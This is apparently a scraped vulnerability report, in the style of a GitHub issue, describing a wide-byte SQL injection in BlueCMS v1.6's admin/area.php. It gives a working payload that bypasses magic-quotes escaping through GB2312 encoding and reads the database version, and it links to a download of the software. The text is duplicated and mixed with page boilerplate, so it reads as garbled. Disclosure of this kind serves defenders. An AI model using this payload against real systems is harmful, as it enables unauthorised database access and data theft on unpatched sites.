in admin/area.php line 36:
Line 36 of admin/area.php is not heavily filtered, and insert at line 47 allows injection
Single quotes cannot be injected because the argument passed in is get_magic_quotes_gpc()
However, we found the use code GB2312 in the returned response header
So we can do wide-byte injection here
payload: area_name=0%df',0,0,0,0),(0,@@Version,0,0,0,0)%23&parentid=0&show_order=0&act=doadd
Successful injection!
The text was updated successfully, but these errors were encountered:
Bluecms_v1.6
Download
http://lp.downcode.com/j_14/j_14745_bluecms.rar
vulnerability code:
in admin/area.php line 36:





Line 36 of admin/area.php is not heavily filtered, and insert at line 47 allows injection
Single quotes cannot be injected because the argument passed in is get_magic_quotes_gpc()
However, we found the use code
GB2312in the returned response headerSo we can do wide-byte injection here
payload: area_name=0%df',0,0,0,0),(0,@@Version,0,0,0,0)%23&parentid=0&show_order=0&act=doadd
Successful injection!
The text was updated successfully, but these errors were encountered: